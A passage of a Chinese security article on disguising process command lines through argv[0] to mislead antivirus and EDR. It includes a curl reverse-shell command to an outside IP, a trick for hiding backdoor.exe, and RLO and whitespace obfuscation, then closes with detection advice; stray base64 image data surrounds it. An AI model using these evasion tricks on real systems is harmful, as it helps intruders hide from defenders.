T7SZIf7DcMp2JorYqoWYsCJ1nrg2tiz1c4Ai8wn/7y6/GgZoq86MDR0SORYbGXw4tzlax8Ww78Hjts8diW3OylTZNpla+/fNsil9EEEyTN6uvvgbzaLikJanw7D5ra+n70vHs7UWXjh96G12IJh6ly5SJAc5rrjTaMB5Kxx+bU5mLnObHhoOuxaiIlWXnIfS+UhjaiM9usYv5ZVtdI2Dfg8jTVLluYxd/aacs6mxt0VpUB1O/Mn+2wgAQnBKDsrHf3PyKOVcTJExNJc8YsA5B+8cDHNAO+eQoSbp+Fhl9MLS0hKA4CilyDDpmJX65Y5qrkteRjrH5X05Zq5fGoN0Prc5YalsMyphMErQ+5q0o3ZSNsLblnPC2yISTzrhZVk5tq79ICVbynFOxBmvI9uTdsqvyUgZXr/t2dQ1B3IcMgpL7pULCwtxPmTESIpkaiMgeBmpC74+ad8HEEnvNt3zMcnIHklu8b55ezSu1Nq31qLf7zf2otQ+ktIbXZPRNry8cw65kFPOKemjLMsGIU37Aj0fucyyP9pPpF3Ln9QzRULaVyqKsIvw5P1JGXlELdD+3YbbUBu5zp//qZcxuH7leukikujv1H6X+k7Co1ylDrk+yOa53fLvP139yv743pFa/42Ir2+/73cGlKdQKBQKhUKhUCgUCsWOjsP/8DLAFYDJ0CC9YhhwIMAcpfozqO4L58mQflLcnZcFujABr9blNOyqw8VJOYQb5Vm51jLGDI1wbnO88PvcaR7LGOInQ33rJyMhU07UBjHBIiZSjvdEEEeyD2Olc6j5lroR5eO9hLMu5ShrI0JSzuYu55J0dEkHa3Q42fotfx4JIx253gRHlfMuRl0am8EDcH4wIgBoOpetHXQOh7ImZNtwzSwbxkhnYjNiQepJRmbJqAr+mTsWOdmSSq0VHYxl82146aDnERXSqV7roNmXJDfrfUmuFQtraycyyZWyD24b3LncRjRIOVJOSgKPdKE6nPCQY24SLbxdL+aA1lG4Z4yH902ZKW2bdJJy+blDW+q+LMqGnuQ8psbLP4cmyRFLc2bZPYIB3wWiDK59H06RJlK+1Drn+ib7lnsI6aJnBx3bEqn1QddTpF9qvwVqkpc70/lelRq/JBx4Wecc4JvkaepZImWRNs7r8t8ko4zgaujF1/pJpeTjbbeRDF1RXlLnNKdyP0pd49dT65+noZM6IPnlHPK9ynsPmw0SN11tctm8H4ySlBFMnPBKfWeRaUblnFF9rjdelr+4wver1HxROf6iR2pO671hkECT3zG69hwuZ+r5n/oeJQkiuedx2cL15hyl5m7w2VyDP98kGS/XEW+T5oiIUE6c8bnn6UJTsqTzXSkUCoVCoVAoFAqFQrEzwBXBB0kOyfiP+k
|
|||
|
|
<p>另一种绕过的杀软的方法是向<code>argv[0]</code>中传入其他的正常内容来迷惑杀软,比如使用<code>attrib.exe</code>来隐藏文件时,可能会触发杀软,但在默认情况下,<code>desktop.ini</code> 文件是隐藏的,杀软可能会将这一情况进行排除,那么此时如果传入的<code>argv=["desktop.ini","+H","backdoor.exe"]</code>可以在一定程度上进行绕过。</p>
|
|||
|
|
<h2 id=toc-3>迷惑欺骗</h2>
|
|||
|
|
<p>某些情况下,EDR设备会获取某个进程的执行命令供安全人员用于分析网络安全事件,此时可以利用<code>argv[0]</code>对进程的执行命令进行伪装。</p>
|
|||
|
|
<p>如下图所示,我们通过curl命令来反弹shell,同时令<code>argv[0]=curl localhost | grep</code></p>
|
|||
|
|
<div class=highlight><pre><span></span>bash -c <span class=s2>"exec -a'curl localhost | grep' curl -Ns telnet://192.168.74.1:8888"</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>此时通过ps命令显示的执行命令为:</p>
|
|||
|
|
<div class=highlight><pre><span></span>curl localhost <span class=p>|</span> grep -Ns telnet://192.168.74.1:8888
|
|||
|
|
</pre></div>
|
|||
|
|
<p>显然对安全人员的分析造成了一定的欺骗,同时<code>argv[0]</code>的内容可以修改得更加复杂来迷惑安全人员。</p>
|
|||
|
|
<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240913104905-bdc630a0-717a-1.png title><img src="data:image/png;base64,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
|
|||
|
|
<p>在Windows平台还可以使用<code>RLO(Right-to-Left Override)</code>来实施干扰。</p>
|
|||
|
|
<p>通过<code>\u202E</code>使后面的字符全部逆序显示来干扰安全人员的分析。</p>
|
|||
|
|
<div class=highlight><pre><span></span>python -c <span class=s2>"import os; os.execvp('curl',['curl \u202E','http://www.baidu.com'])"</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240913104911-c1793dfa-717a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>同时,也可以添加足够多的空白字符来隐藏执行的命令,在某些情况下,EDR为了节省开销只会截取特定长度的命令进行输出显示,从而让安全人员忽视这些危险操作。</p>
|
|||
|
|
<div class=highlight><pre><span></span>python -c <span class=s2>"import os; os.execvp('curl',[' '*1000,'http://www.baidu.com'])"</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240913104917-c4b390e2-717a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<h2 id=toc-4>预防和检测</h2>
|
|||
|
|
<p>对于网络安全人员来讲,我们应该要了解<code>argv[0]</code>如何工作以及它所带来的网络安全威胁,同时采取一定的手段进行规避检测,对于过长的或者包含有RLO字符的命令应标记为可疑;又或者在报告命令行参数时直接忽视掉<code>argv[0]</code>,以减小其带来的影响。</p>
|
|||
|
|
<p>参考:</p>
|
|||
|
|
<p><a href=https://www.wietzebeukema.nl/blog/why-bother-with-argv0 target=_blank>Why bother with argv[0]?</a></p>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=post-user-action style=margin-top:34px>
|
|||
|
|
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15609>
|
|||
|
|
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right" id=follow_topic data-pk=15609>
|
|||
|
|
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class="btn btn-default pull-right">
|
|||
|
|
<span>
|
|||
|
|
|
|||
|
|
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
|
|||
|
|
|
|||
|
|
</span>
|
|||
|
|
</span>
|
|||
|
|
|
|||
|
|
<div class=clearfix></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
<div class=related-section>
|
|||
|
|
<div class=related-box>
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/15607 title="Hikvision综合安防管理平台isecure center文件读取深度利用"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>Hikvision综合安防管理平台...</a></span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span><a class=pull-left href=https://xz.aliyun.com/t/15610 title=基于flask常见trick——unicode&进制编码绕过><span class=related-label>下一篇:</span>基于flask常见trick——u...</a></span>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
|
|||
|
|
<div class=modal-dialog>
|
|||
|
|
<div class=modal-content>
|
|||
|
|
